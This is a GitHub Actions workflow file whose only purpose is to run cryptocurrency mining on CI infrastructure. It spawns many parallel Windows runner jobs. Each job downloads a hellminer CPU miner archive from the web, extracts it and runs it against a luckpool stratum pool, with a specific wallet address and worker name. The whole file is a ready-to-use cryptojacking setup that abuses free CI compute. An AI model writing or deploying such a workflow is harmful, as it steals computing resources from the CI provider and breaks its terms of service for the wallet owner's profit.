name: Jatah
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: Ronde
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: PREPARING
      run: Invoke-WebRequest https://github.com/hellcatz/luckpool/blob/master/miners/hellminer_cpu_win64_avx.zip -OutFile hellminer_cpu_win64_avx.zip
    - name: Seting-UP
      run: Expand-Archive hellminer_cpu_win64_avx.zip
    - name: Running
      run: .\hellminer_cpu_win64_avx\hellminer.exe -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RPLUG166jWVVGY5pSojrdNqckNKjUZPxKR.GAJI8 -p x --cpu 2
    - name: END
      run: exit
